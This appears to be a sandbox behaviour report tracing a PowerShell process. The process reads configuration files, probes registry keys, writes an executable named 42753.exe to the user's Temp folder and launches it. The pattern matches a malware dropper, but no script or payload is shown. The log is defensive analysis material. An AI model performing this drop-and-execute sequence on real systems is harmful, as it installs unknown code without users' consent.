Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\Desktop type = file_attributes True 9
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe type = file_type True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe type = file_attributes True 3
Fn
Open STD_INPUT_HANDLE True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4096 True 3
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 8575 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4616 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 23232 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 45012 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4356 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4321 True 1
Fn
Data
Registry (211)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Open Key HKEY_CURRENT_USER\Environment True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Open Key HKEY_CURRENT_USER True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Process (2)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe show_window = SW_SHOWNORMAL True 1
Fn
Get Info type = PROCESS_BASIC_INFORMATION True 1
Fn
Module (5)
+
Operation Module Additional Information Success Count Logfile
Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 2048 True 1
Fn
